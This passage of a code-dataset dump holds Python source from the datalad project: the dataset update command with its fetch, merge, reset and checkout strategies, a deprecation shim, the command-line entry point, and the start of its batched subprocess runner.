res.get(\"gitshasum\")\n\n\ndef _process_how_args(merge, how, how_subds):\n \"\"\"Resolve how-related arguments into `how` and `how_subds` values.\n \"\"\"\n # Translate old --merge value onto --how\n if merge and (how or how_subds):\n raise ValueError(\"`merge` is incompatible with `how` and `how_subds`\")\n elif merge == \"ff-only\":\n how = merge\n elif merge:\n how = \"merge\"\n\n if how == \"fetch\":\n how = None\n\n # Map \"fetch\" to None for easier conditions.\n if how_subds == \"fetch\":\n how_subds = None\n elif how_subds is None:\n # Subdatasets are updated according to --how unless --how-subds is\n # given.\n how_subds = how\n return how, how_subds\n\n\n_how_constraints = EnsureChoice(\n \"fetch\", \"merge\", \"ff-only\", \"reset\", \"checkout\", None)\n\n\n@build_doc\nclass Update(Interface):\n \"\"\"Update a dataset from a sibling.\n\n \"\"\"\n # TODO: adjust docs to say:\n # - update from just one sibling at a time\n\n _examples_ = [\n dict(text=\"Update from a particular sibling\",\n code_py=\"update(sibling='siblingname')\",\n code_cmd=\"datalad update -s <siblingname>\"),\n dict(text=\"Update from a particular sibling and merge the changes \"\n \"from a configured or matching branch from the sibling \"\n \"(see [CMD: --follow CMD][PY: `follow` PY] for details)\",\n code_py=\"update(sibling='siblingname', how='merge')\",\n code_cmd=\"datalad update --how=merge -s <siblingname>\"),\n dict(text=\"Update from the sibling 'origin', traversing into \"\n \"subdatasets. For subdatasets, merge the revision \"\n \"registered in the parent dataset into the current branch\",\n code_py=\"update(sibling='origin', how='merge', \"\n \"follow='parentds', recursive=True)\",\n code_cmd=\"datalad update -s origin --how=merge \"\n \"--follow=parentds -r\"),\n dict(text=\"Fetch and merge the remote tracking branch \"\n \"into the current dataset. Then update each subdataset \"\n \"by resetting its current branch to the revision \"\n \"registered in the parent dataset, fetching only if \"\n \"the revision isn't already present\",\n code_py=\"update(how='merge', how_subds='reset', \"\n \"follow='parentds-lazy', recursive=True)\",\n code_cmd=\"datalad update --how=merge --how-subds=reset\"\n \"--follow=parentds-lazy -r\"),\n ]\n\n _params_ = dict(\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"\"\"constrain to-be-updated subdatasets to the given path for recursive\n operation.\"\"\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n sibling=Parameter(\n args=(\"-s\", \"--sibling\",),\n doc=\"\"\"name of the sibling to update from. When unspecified,\n updates from all siblings are fetched. If there is more than one\n sibling and changes will be brought into the working tree (as\n requested via [CMD: --merge, --how, or --how-subds CMD][PY:\n `merge`, `how`, or `how_subds` PY]), a sibling will be chosen based\n on the configured remote for the current branch.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to update. 
If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n merge=Parameter(\n args=(\"--merge\",),\n metavar=\"ALLOWED\",\n # const and nargs are set to map --merge to --merge=any.\n const=\"any\",\n nargs=\"?\",\n constraints=EnsureBool() | EnsureChoice(\"any\", \"ff-only\"),\n # TODO: Decide whether this should be removed eventually.\n doc=\"\"\"merge obtained changes from the sibling. This is a subset of\n the functionality that can be achieved via the newer [CMD: --how\n CMD][PY: `how` PY]. [CMD: --merge or --merge=any CMD][PY:\n merge=True or merge=\"any\" PY] is equivalent to [CMD: --how=merge\n CMD][PY: how=\"merge\" PY]. [CMD: --merge=ff-only CMD][PY:\n merge=\"ff-only\" PY] is equivalent to [CMD: --how=ff-only CMD][PY:\n how=\"ff-only\" PY].\"\"\"),\n how=Parameter(\n args=(\"--how\",),\n nargs=\"?\",\n constraints=_how_constraints,\n doc=\"\"\"how to update the dataset. The default (\"fetch\") simply\n fetches the changes from the sibling but doesn't incorporate them\n into the working tree. A value of \"merge\" or \"ff-only\" merges in\n changes, with the latter restricting the allowed merges to\n fast-forwards. \"reset\" incorporates the changes with 'git reset\n --hard <target>', staying on the current branch but discarding any\n changes that aren't shared with the target. \"checkout\", on the\n other hand, runs 'git checkout <target>', switching from the\n current branch to a detached state. When [CMD: --recursive CMD][PY:\n recursive=True PY] is specified, this action will also apply to\n subdatasets unless overridden by [CMD: --how-subds CMD][PY:\n `how_subds` PY].\"\"\"),\n how_subds=Parameter(\n args=(\"--how-subds\",),\n nargs=\"?\",\n constraints=_how_constraints,\n doc=\"\"\"Override the behavior of [CMD: --how CMD][PY: `how` PY] in\n subdatasets.\"\"\"),\n follow=Parameter(\n args=(\"--follow\",),\n constraints=EnsureChoice(\"sibling\", \"parentds\", \"parentds-lazy\"),\n doc=\"\"\"source of updates for subdatasets. For 'sibling', the update\n will be done by merging in a branch from the (specified or\n inferred) sibling. The branch brought in will either be the current\n branch's configured branch, if it points to a branch that belongs\n to the sibling, or a sibling branch with a name that matches the\n current branch. For 'parentds', the revision registered in the\n parent dataset of the subdataset is merged in. 'parentds-lazy' is\n like 'parentds', but prevents fetching from a subdataset's sibling\n if the registered revision is present in the subdataset. Note that\n the current dataset is always updated according to 'sibling'. 
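For example, with 'parentds' a subdataset is updated to the\n            subdataset commit recorded in its superdataset, rather than to\n            whatever its own sibling currently carries. 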
This\n option has no effect unless a merge is requested and [CMD:\n --recursive CMD][PY: recursive=True PY] is specified.\"\"\", ),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n fetch_all=Parameter(\n args=(\"--fetch-all\",),\n action=\"store_true\",\n doc=\"\"\"this option has no effect and will be removed in a future version.\n When no siblings are given, an all-sibling update will be performed.\"\"\", ),\n reobtain_data=Parameter(\n args=(\"--reobtain-data\",),\n action=\"store_true\",\n doc=\"\"\"if enabled, file content that was present before an update\n will be re-obtained in case a file was changed by the update.\"\"\"), )\n\n @staticmethod\n @datasetmethod(name='update')\n @eval_results\n def __call__(\n path=None,\n *,\n sibling=None,\n merge=False,\n how=None,\n how_subds=None,\n follow=\"sibling\",\n dataset=None,\n recursive=False,\n recursion_limit=None,\n fetch_all=None,\n reobtain_data=False):\n if fetch_all is not None:\n lgr.warning('update(fetch_all=...) called. Option has no effect, and will be removed')\n if path and not recursive:\n lgr.warning('path constraints for subdataset updates ignored, '\n 'because `recursive` option was not given')\n\n how, how_subds = _process_how_args(merge, how, how_subds)\n # `merge` should be considered through `how` and `how_subds` only.\n # Unbind `merge` to ensure that downstream code doesn't look at it.\n del merge\n\n refds = require_dataset(dataset, check_installed=True, purpose='update')\n\n save_paths = []\n update_failures = set()\n saw_subds = False\n for ds, revision in itertools.chain([(refds, None)], refds.subdatasets(\n path=path,\n state='present',\n recursive=recursive,\n recursion_limit=recursion_limit,\n return_type='generator',\n result_renderer='disabled',\n result_xfm=YieldDatasetAndRevision()) if recursive else []):\n if ds != refds:\n saw_subds = True\n repo = ds.repo\n is_annex = isinstance(repo, AnnexRepo)\n # prepare return value\n res = get_status_dict('update', ds=ds, logger=lgr, refds=refds.path)\n\n follow_parent = revision and follow.startswith(\"parentds\")\n follow_parent_lazy = revision and follow == \"parentds-lazy\"\n if follow_parent_lazy and \\\n repo.get_hexsha(repo.get_corresponding_branch()) == revision:\n res[\"message\"] = (\n \"Dataset already at commit registered in parent: %s\",\n repo.path)\n res[\"status\"] = \"notneeded\"\n yield res\n continue\n\n how_curr = how_subds if revision else how\n # get all remotes which have references (would exclude\n # special remotes)\n remotes = repo.get_remotes(\n **({'exclude_special_remotes': True} if is_annex else {}))\n if not remotes and not sibling:\n res['message'] = (\"No siblings known to dataset at %s\\nSkipping\",\n repo.path)\n res['status'] = 'notneeded'\n yield res\n continue\n curr_branch = repo.get_active_branch()\n tracking_remote = None\n if not sibling and len(remotes) == 1:\n # there is only one remote, must be this one\n sibling_ = remotes[0]\n elif not sibling:\n # nothing given, look for tracking branch\n tracking_remote = repo.get_tracking_branch(\n branch=curr_branch, remote_only=True)[0]\n sibling_ = tracking_remote\n else:\n sibling_ = sibling\n if sibling_ and sibling_ not in remotes:\n res['message'] = (\"'%s' not known to dataset %s\\nSkipping\",\n sibling_, repo.path)\n res['status'] = 'impossible'\n yield res\n continue\n if not sibling_ and len(remotes) > 1 and how_curr:\n lgr.debug(\"Found multiple siblings:\\n%s\", remotes)\n res['status'] = 'impossible'\n res['message'] = \"Multiple siblings, please 
specify from which to update.\"\n yield res\n continue\n lgr.info(\"Fetching updates for %s\", ds)\n # fetch remote\n fetch_kwargs = dict(\n # test against user-provided value!\n remote=None if sibling is None else sibling_,\n all_=sibling is None,\n git_options=[\n # required to not trip over submodules that were removed in\n # the origin clone\n \"--no-recurse-submodules\",\n # prune to not accumulate a mess over time\n \"--prune\"]\n )\n if not (follow_parent_lazy and repo.commit_exists(revision)):\n try:\n repo.fetch(**fetch_kwargs)\n except CommandError as exc:\n ce = CapturedException(exc)\n yield get_status_dict(status=\"error\",\n message=(\"Fetch failed: %s\", ce),\n exception=ce,\n **res,)\n continue\n\n # NOTE reevaluate ds.repo again, as it might have be converted from\n # a GitRepo to an AnnexRepo\n repo = ds.repo\n\n if follow_parent and not repo.commit_exists(revision):\n if sibling_:\n try:\n lgr.debug(\"Fetching revision %s directly for %s\",\n revision, repo)\n repo.fetch(remote=sibling_, refspec=revision,\n git_options=[\"--recurse-submodules=no\"])\n except CommandError as exc:\n ce = CapturedException(exc)\n yield dict(\n res,\n status=\"impossible\",\n message=(\n \"Attempt to fetch %s from %s failed: %s\",\n revision, sibling_, ce),\n exception=ce\n )\n continue\n else:\n yield dict(res,\n status=\"impossible\",\n message=(\"Need to fetch %s directly \"\n \"but single sibling not resolved\",\n revision))\n continue\n\n saw_update_failure = False\n if how_curr:\n if follow_parent:\n target = revision\n else:\n target = _choose_update_target(\n repo, curr_branch,\n sibling_, tracking_remote)\n\n adjusted = is_annex and repo.is_managed_branch(curr_branch)\n if adjusted:\n if follow_parent:\n yield dict(\n res, status=\"impossible\",\n message=(\"follow='parentds' is incompatible \"\n \"with adjusted branches\"))\n continue\n if how_curr != \"merge\":\n yield dict(\n res, status=\"impossible\",\n message=(\"Updating via '%s' is incompatible \"\n \"with adjusted branches\",\n how_curr))\n continue\n\n update_fn = _choose_update_fn(\n repo,\n how_curr,\n is_annex=is_annex,\n adjusted=adjusted)\n\n fn_opts = [\"--ff-only\"] if how_curr == \"ff-only\" else None\n if update_fn is not _annex_sync:\n if target is None:\n yield dict(res,\n status=\"impossible\",\n message=\"Could not determine update target\")\n continue\n\n if is_annex and reobtain_data:\n update_fn = _reobtain(ds, update_fn)\n\n for ures in update_fn(repo, sibling_, target, opts=fn_opts):\n # NOTE: Ideally the \"merge\" action would also be prefixed\n # with \"update.\", but a plain \"merge\" is used for backward\n # compatibility.\n if ures[\"status\"] != \"ok\" and (\n ures[\"action\"] == \"merge\" or\n ures[\"action\"].startswith(\"update.\")):\n saw_update_failure = True\n yield dict(res, **ures)\n\n if saw_update_failure:\n update_failures.add(ds)\n res['status'] = 'error'\n res['message'] = (\"Update of %s failed\", target)\n else:\n res['status'] = 'ok'\n save_paths.append(ds.path)\n yield res\n # we need to save updated states only if merge was requested -- otherwise\n # it was a pure fetch\n if how_curr and recursive:\n yield from _save_after_update(\n refds, save_paths, update_failures, path, saw_subds)\n\n\ndef _save_after_update(refds, tosave, update_failures, path_arg, saw_subds):\n if path_arg and not saw_subds:\n lgr.warning(\n 'path constraints did not match an installed subdataset: %s',\n path_arg)\n if refds in update_failures:\n lgr.warning(\"Not saving because top-level dataset %s \"\n 
\"had an update failure in subdataset\",\n refds.path)\n else:\n save_paths = [p for p in tosave if p != refds.path]\n if not save_paths:\n return\n lgr.debug(\n 'Subdatasets where updated state may need to be '\n 'saved in the parent dataset: %s', save_paths)\n for r in refds.save(\n path=save_paths,\n recursive=False,\n message='[DATALAD] Save updated subdatasets',\n return_type='generator',\n result_renderer='disabled'):\n yield r\n\n\ndef _choose_update_target(repo, branch, remote, cfg_remote):\n \"\"\"Select a target to update `repo` from.\n\n Note: This function is not concerned with _how_ the update is done (e.g.,\n merge, reset, ...).\n\n Parameters\n ----------\n repo : Repo instance\n branch : str\n The current branch.\n remote : str\n The remote which updates are coming from.\n cfg_remote : str\n The configured upstream remote.\n\n Returns\n -------\n str (the target) or None if a choice wasn't made.\n \"\"\"\n target = None\n if cfg_remote and remote == cfg_remote:\n # Use the configured cfg_remote branch as the target.\n #\n # In this scenario, it's tempting to use FETCH_HEAD as the target. For\n # a merge, that would be the equivalent of 'git pull REMOTE'. But doing\n # so would be problematic when the GitRepo.fetch() call was passed\n # all_=True. Given we can't use FETCH_HEAD, it's tempting to use the\n # branch.*.merge value, but that assumes a value for remote.*.fetch.\n target = repo.call_git_oneline(\n [\"rev-parse\", \"--symbolic-full-name\", \"--abbrev-ref=strict\",\n \"@{upstream}\"],\n read_only=True)\n elif branch:\n remote_branch = \"{}/{}\".format(remote, branch)\n if repo.commit_exists(remote_branch):\n target = remote_branch\n return target\n\n\n# Update functions\n\n\ndef _choose_update_fn(repo, how, is_annex=False, adjusted=False):\n if adjusted and how != \"merge\":\n raise RuntimeError(\n \"bug: Upstream checks should abort if adjusted is used \"\n \"with action other than 'merge'\")\n elif how in [\"merge\", \"ff-only\"]:\n if adjusted and is_annex:\n # For adjusted repos, blindly sync.\n fn = _annex_sync\n elif is_annex:\n fn = _annex_plain_merge\n elif adjusted:\n raise RuntimeError(\n \"bug: Upstream checks should make it impossible for \"\n \"adjusted=True, is_annex=False\")\n else:\n fn = _plain_merge\n elif how == \"reset\":\n fn = _reset_hard\n elif how == \"checkout\":\n fn = _checkout\n else:\n raise ValueError(f\"Unrecognized value for `how`: {how}\")\n return fn\n\n\ndef _try_command(record, fn, *args, **kwargs):\n \"\"\"Call `fn`, catching a `CommandError`.\n\n Parameters\n ----------\n record : dict\n A partial result record. It should at least have 'action' and 'message'\n fields. 
A 'status' value of 'ok' or 'error' will be added based on\n whether calling `fn` raises a `CommandError`.\n\n Returns\n -------\n A new record with a 'status' field.\n \"\"\"\n try:\n fn(*args, **kwargs)\n except CommandError as exc:\n ce = CapturedException(exc)\n return dict(record, status=\"error\", message=str(ce))\n else:\n return dict(record, status=\"ok\")\n\n\ndef _plain_merge(repo, _, target, opts=None):\n yield _try_command(\n {\"action\": \"merge\", \"message\": (\"Merged %s\", target)},\n repo.merge,\n name=target, options=opts,\n expect_fail=True, expect_stderr=True)\n\n\ndef _annex_plain_merge(repo, _, target, opts=None):\n yield from _plain_merge(repo, _, target, opts=opts)\n # Note: Avoid repo.merge_annex() so we don't needlessly create synced/\n # branches.\n yield _try_command(\n {\"action\": \"update.annex_merge\", \"message\": \"Merged annex branch\"},\n repo.call_annex, [\"merge\"])\n\n\ndef _annex_sync(repo, remote, _target, opts=None):\n yield _try_command(\n {\"action\": \"update.annex_sync\", \"message\": \"Ran git-annex-sync\"},\n repo.call_annex,\n ['sync', '--no-push', '--pull', '--no-commit', '--no-content', remote])\n\n\ndef _reset_hard(repo, _, target, opts=None):\n if repo.dirty:\n yield {\"action\": \"update.reset\",\n \"status\": \"error\",\n \"message\": \"Refusing to reset dirty working tree\"}\n else:\n yield _try_command(\n {\"action\": \"update.reset\", \"message\": (\"Reset to %s\", target)},\n repo.call_git,\n [\"reset\", \"--hard\", target])\n\n\ndef _checkout(repo, _, target, opts=None):\n yield _try_command(\n {\"action\": \"update.checkout\", \"message\": (\"Checkout %s\", target)},\n repo.call_git,\n [\"checkout\", target])\n\n\ndef _reobtain(ds, update_fn):\n def wrapped(*args, **kwargs):\n repo = ds.repo\n repo_pathobj = repo.pathobj\n\n lgr.info(\"Applying updates to %s\", ds)\n # get all annexed files that have data present\n lgr.info('Recording file content availability '\n 'to re-obtain updated files later on')\n ainfo = repo.get_content_annexinfo(\n init=None, eval_availability=True)\n # Recode paths for ds.get() call.\n present_files = [str(ds.pathobj / f.relative_to(repo_pathobj))\n for f, st in ainfo.items() if st[\"has_content\"]]\n\n yield from update_fn(*args, **kwargs)\n\n present_files = [p for p in present_files if lexists(p)]\n if present_files:\n lgr.info('Ensuring content availability for %i '\n 'previously available files',\n len(present_files))\n yield from ds.get(present_files, recursive=False,\n return_type='generator')\n return wrapped\n" }, { "alpha_fraction": 0.73384028673172, "alphanum_fraction": 0.73384028673172, "avg_line_length": 28.22222137451172, "blob_id": "d24384eaefe8ae343b820930840acc42ea8b38e9", "content_id": "fb2a060968ae41c32304236540c42246e308db44", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "permissive", "max_line_length": 76, "num_lines": 9, "path": "/datalad/plugin/no_annex.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.no_annex is deprecated and will be removed in a future \"\n \"release. 
\"\n \"Use the module from its new location datalad.local.no_annex instead.\",\n DeprecationWarning)\n\nfrom datalad.local.no_annex import *\n" }, { "alpha_fraction": 0.6453213691711426, "alphanum_fraction": 0.6481055617332458, "avg_line_length": 33.7100830078125, "blob_id": "fc3f1a675bd9ea690a939e0e96f594e6f398ff24", "content_id": "bb68e46c86e09825e3d5600f806b676cab33a9be", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8261, "license_type": "permissive", "max_line_length": 87, "num_lines": 238, "path": "/datalad/cli/main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"This is the main() CLI entryproint\"\"\"\n\n# It should start-up and run as fast as possible for a responsive CLI.\n\n# Imports are done inline and as late as possible to avoid paying for\n# an unconditional commulative overhead that is only actually needed\n# in some special cases.\n\n__docformat__ = 'restructuredtext'\n\nimport logging\n\nlgr = logging.getLogger('datalad.cli')\n\nlgr.log(5, \"Importing cli.main\")\n\nimport os\nimport sys\n\nimport datalad\n\nfrom .parser import setup_parser\n\n# TODO cross-check with unconditional imports in .parser\n# special case imports\n# from .helpers import _fix_datalad_ri\n# import platform\n# from .helpers import _parse_overrides_from_cmdline\n# from datalad.utils import chpwd\n# from .utils import setup_exceptionhook\n# from datalad.support.exceptions import ...\n\n# unconditional imports, no meaningful functionality without them\n# from .parser import setup_parser\n\n\ndef _on_msys_tainted_paths():\n \"\"\"This duplicates datalad.utils.on_msys_tainted_paths\n\n But it does it while minimizing runtime penalties on all irrelevant\n systems.\n \"\"\"\n if os.environ.get('MSYSTEM', '')[:4] not in ('MSYS', 'MING'):\n return False\n if 'MSYS_NO_PATHCONV' in os.environ:\n return False\n import platform\n if platform.system().lower() != 'windows':\n return False\n return True\n\n\ndef main(args=sys.argv):\n \"\"\"Main CLI entrypoint\"\"\"\n lgr.log(5, \"Starting main(%r)\", args)\n # record that we came in via the cmdline\n datalad.__api = 'cmdline'\n completing = \"_ARGCOMPLETE\" in os.environ\n if completing and 'COMP_LINE' in os.environ:\n import shlex\n\n # TODO support posix=False too?\n args = shlex.split(os.environ['COMP_LINE']) or args\n\n if _on_msys_tainted_paths():\n # Possibly present DataLadRIs were stripped of a leading /\n from .helpers import _fix_datalad_ri\n args = [_fix_datalad_ri(s) for s in args]\n\n from datalad.support.entrypoints import load_extensions\n\n # load extensions requested by configuration\n # analog to what coreapi is doing for a Python session\n # importantly, load them prior to parser construction, such\n # that CLI tuning is also within reach for extensions\n load_extensions()\n\n # PYTHON_ARGCOMPLETE_OK\n # TODO possibly construct a dedicated parser just for autocompletion\n # rather than lobotomizing the normal one\n parser = setup_parser(args, completing=completing)\n try:\n import argcomplete\n argcomplete.autocomplete(parser)\n except ImportError:\n 
pass\n\n # parse cmd args\n lgr.debug(\"Parsing known args among %r\", args)\n cmdlineargs, unparsed_args = parser.parse_known_args(args[1:])\n # did the parser tell us what command to run?\n has_func = hasattr(cmdlineargs, 'func') and cmdlineargs.func is not None\n if unparsed_args:\n if has_func:\n lgr.error('unknown argument%s: %s',\n 's' if len(unparsed_args) > 1 else '',\n unparsed_args if len(unparsed_args) > 1 else unparsed_args[0],\n )\n cmdlineargs.subparser.print_usage()\n sys.exit(1)\n else:\n # store all unparsed arguments\n cmdlineargs.datalad_unparsed_args = unparsed_args\n\n # pull config overrides from cmdline args and put in effect\n if cmdlineargs.cfg_overrides is not None:\n from .helpers import _parse_overrides_from_cmdline\n datalad.cfg.overrides.update(\n _parse_overrides_from_cmdline(cmdlineargs)\n )\n # enable overrides\n datalad.cfg.reload(force=True)\n # try loading extensions again, in case the configuration\n # added new ones to consider\n load_extensions()\n\n if 'datalad.runtime.librarymode' in datalad.cfg:\n datalad.enable_librarymode()\n\n if cmdlineargs.change_path is not None:\n from datalad.utils import chpwd\n for path in cmdlineargs.change_path:\n chpwd(path)\n\n # check argparse could determine what commands needs to be executed\n if not has_func:\n # just let argparser spit out its error, since there is smth wrong\n parser.parse_args(args)\n # if that one didn't puke -- we should\n parser.print_usage()\n lgr.error(\"Please specify the command\")\n # matches exit code for InsufficientArgumentsError\n sys.exit(2)\n\n _run(cmdlineargs)\n\n\ndef _run(namespace):\n \"\"\"Execute a CLI operation\n\n Depending on CLI debugging options the CLI operation is executed\n in a debug harness or an exception handler.\n\n Parameters\n ----------\n namespace: Namespace\n Object returned by `ArgumentParser.parse_args()` with fully\n populated and validated CLI command and arguments.\n\n Raises\n ------\n SystemExit\n When the CLI completed without error (exit 0).\n \"\"\"\n # execute the command, either with a debugger catching\n # a crash, or with a simplistic exception handler.\n # note that result rendering is happening in the\n # execution handler, when the command-generator is unwound\n ret = _run_with_debugger(namespace) \\\n if namespace.common_debug or namespace.common_idebug \\\n else _run_with_exception_handler(namespace)\n\n # all good, not strictly needed, but makes internal testing easier\n sys.exit(0)\n\n\ndef _run_with_debugger(cmdlineargs):\n \"\"\"Execute the command and drop into debugger if it crashes\"\"\"\n from .utils import setup_exceptionhook\n\n # so we could see/stop clearly at the point of failure\n setup_exceptionhook(ipython=cmdlineargs.common_idebug)\n return cmdlineargs.func(cmdlineargs)\n\n\ndef _run_with_exception_handler(cmdlineargs):\n \"\"\"Execute the command and perform some reporting\n normalization if it crashes, but otherwise just let it go\"\"\"\n # otherwise - guard and only log the summary. 
Postmortem is not\n # as convenient if being caught in this ultimate except\n try:\n return cmdlineargs.func(cmdlineargs)\n # catch BaseException for KeyboardInterrupt\n except BaseException as exc:\n from datalad.support.exceptions import (\n CapturedException,\n CommandError,\n IncompleteResultsError,\n InsufficientArgumentsError,\n )\n ce = CapturedException(exc)\n # we crashed, it has got to be non-zero for starters\n exit_code = 1\n if isinstance(exc, InsufficientArgumentsError):\n # if the func reports inappropriate usage, give help output\n lgr.error('%s (%s)', ce, exc.__class__.__name__)\n cmdlineargs.subparser.print_usage(sys.stderr)\n exit_code = 2\n elif isinstance(exc, IncompleteResultsError):\n # in general we do not want to see the error again, but\n # present in debug output\n lgr.debug('could not perform all requested actions: %s', ce)\n elif isinstance(exc, CommandError):\n exit_code = _communicate_commanderror(exc) or exit_code\n elif isinstance(exc, KeyboardInterrupt):\n from datalad.ui import ui\n ui.error(\"\\nInterrupted by user while doing magic: %s\" % ce)\n exit_code = 3\n else:\n # some unforeseen problem\n lgr.error('%s', ce.format_with_cause())\n sys.exit(exit_code)\n\n\ndef _communicate_commanderror(exc):\n \"\"\"Behave as if the command ran directly\"\"\"\n exc_msg = exc.to_str(include_output=False)\n if exc_msg:\n msg = exc_msg.encode() if isinstance(exc_msg, str) else exc_msg\n os.write(2, msg + b\"\\n\")\n # push any captured output to the respective streams\n for out, stream in ((exc.stdout, 1), (exc.stderr, 2)):\n if out:\n os.write(stream,\n out.encode() if isinstance(out, str) else out)\n # pass on exit code\n return exc.code\n\n\nlgr.log(5, \"Done importing cli.main\")\n" }, { "alpha_fraction": 0.5609220266342163, "alphanum_fraction": 0.5626261234283447, "avg_line_length": 34.39523696899414, "blob_id": "6a4b7bcf33cf37b8931d5b3bf064a9a72d04c661", "content_id": "51e5b02d7ea611c1e912cdad73008ff59d09e32d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22299, "license_type": "permissive", "max_line_length": 105, "num_lines": 630, "path": "/datalad/cmd.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\nClass the starts a subprocess and keeps it around to communicate with it\nvia stdin. For each instruction send over stdin, a response is read and\nreturned. 
The response structure is determined by \"output_proc\"\n\n\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport os\nimport queue\nimport sys\nimport warnings\nfrom datetime import datetime\nfrom operator import attrgetter\nfrom queue import Queue\nfrom subprocess import TimeoutExpired\nfrom typing import (\n Any,\n Callable,\n List,\n Optional,\n Tuple,\n Union,\n)\nfrom weakref import (\n ReferenceType,\n WeakValueDictionary,\n ref,\n)\n\nfrom datalad import cfg\n# start of legacy import block\n# to avoid breakage of code written before datalad.runner\nfrom datalad.runner.coreprotocols import (\n KillOutput,\n NoCapture,\n StdErrCapture,\n StdOutCapture,\n StdOutErrCapture,\n)\nfrom datalad.runner.gitrunner import (\n GIT_SSH_COMMAND,\n GitRunnerBase,\n GitWitlessRunner,\n)\nfrom datalad.runner.nonasyncrunner import (\n STDERR_FILENO,\n STDOUT_FILENO,\n _ResultGenerator,\n run_command,\n)\nfrom datalad.runner.protocol import (\n GeneratorMixIn,\n WitlessProtocol,\n)\nfrom datalad.runner.runner import WitlessRunner\nfrom datalad.runner.utils import LineSplitter\nfrom datalad.support.exceptions import CommandError\nfrom datalad.utils import (\n auto_repr,\n ensure_unicode,\n)\n\n# end of legacy import block\n\n\n\n__docformat__ = \"restructuredtext\"\n\n\n_cfg_var = \"datalad.runtime.stalled-external\"\n_cfg_val = cfg.obtain(_cfg_var)\n\n\nclass BatchedCommandError(CommandError):\n def __init__(self,\n cmd=\"\",\n last_processed_request=\"\",\n msg=\"\",\n code=None,\n stdout=\"\",\n stderr=\"\",\n cwd=None,\n **kwargs):\n \"\"\"\n This exception extends a CommandError that is raised by the command,\n that is executed by `BatchedCommand`. It extends the `CommandError` by\n `last_processed_request`. This attribute contains the last request, i.e.\n argument to `BatchedCommand.__call__()`, that was successfully\n processed, i.e. for which a result was received from the command (that\n does not imply that the result was positive).\n\n :param last_processed_request: the last request for which a response was\n received from the underlying command. 
This could be used to restart\n an interrupted process.\n\n For all other arguments see `CommandError`.\n \"\"\"\n CommandError.__init__(\n self,\n cmd=cmd,\n msg=msg,\n code=code,\n stdout=stdout,\n stderr=stderr,\n cwd=cwd,\n **kwargs\n )\n self.last_processed_request = last_processed_request\n\n\nlgr = logging.getLogger('datalad.cmd')\n\n# TODO unused?\n# In python3 to split byte stream on newline, it must be bytes\nlinesep_bytes = os.linesep.encode()\n\n# TODO unused?\n_TEMP_std = sys.stdout, sys.stderr\n\n# TODO unused?\n# To be used in the temp file name to distinguish the ones we create\n# in Runner so we take care about their removal, in contrast to those\n# which might be created outside and passed into Runner\n_MAGICAL_OUTPUT_MARKER = \"_runneroutput_\"\n\n\ndef readline_rstripped(stdout):\n warnings.warn(\"the function `readline_rstripped()` is deprecated \"\n \"and will be removed in a future release\",\n DeprecationWarning)\n return _readline_rstripped(stdout)\n\n\ndef _readline_rstripped(stdout):\n \"\"\"Internal helper for BatchedCommand\"\"\"\n return stdout.readline().rstrip()\n\n\nclass BatchedCommandProtocol(GeneratorMixIn, StdOutErrCapture):\n def __init__(self,\n batched_command: \"BatchedCommand\",\n done_future: Any = None,\n encoding: Optional[str] = None,\n output_proc: Optional[Callable] = None,\n ):\n GeneratorMixIn.__init__(self)\n StdOutErrCapture.__init__(self, done_future, encoding)\n self.batched_command = batched_command\n self.output_proc = output_proc\n self.line_splitter = LineSplitter()\n\n def pipe_data_received(self, fd: int, data: bytes):\n if fd == STDERR_FILENO:\n self.send_result((fd, data))\n elif fd == STDOUT_FILENO:\n for line in self.line_splitter.process(data.decode(self.encoding)):\n self.send_result((fd, line))\n else:\n raise ValueError(f\"unknown file descriptor: {fd}\")\n\n def pipe_connection_lost(self, fd: int, exc: Optional[BaseException]):\n if fd == STDOUT_FILENO:\n remaining_line = self.line_splitter.finish_processing()\n if remaining_line is not None:\n lgr.debug(\"unterminated line: %s\", remaining_line)\n self.send_result((fd, remaining_line))\n\n def timeout(self, fd: Optional[int]) -> bool:\n timeout_error = self.batched_command.get_timeout_exception(fd)\n if timeout_error:\n raise timeout_error\n self.send_result((\"timeout\", fd))\n return False\n\n\nclass ReadlineEmulator:\n \"\"\"\n This class implements readline() on the basis of an instance of\n BatchedCommand. Its purpose is to emulate stdout's for output_procs,\n This allows us to provide a BatchedCommand API that is identical\n to the old version, but with an implementation that is based on the\n threaded runner.\n \"\"\"\n def __init__(self,\n batched_command: \"BatchedCommand\"):\n self.batched_command = batched_command\n\n def readline(self):\n \"\"\"\n Read from the stdout provider until we have a line or None (which\n indicates some error).\n \"\"\"\n return self.batched_command.get_one_line()\n\n\nclass SafeDelCloseMixin(object):\n \"\"\"A helper class to use where __del__ would call .close() which might\n fail if \"too late in GC game\"\n \"\"\"\n def __del__(self):\n try:\n self.close()\n except (TypeError, 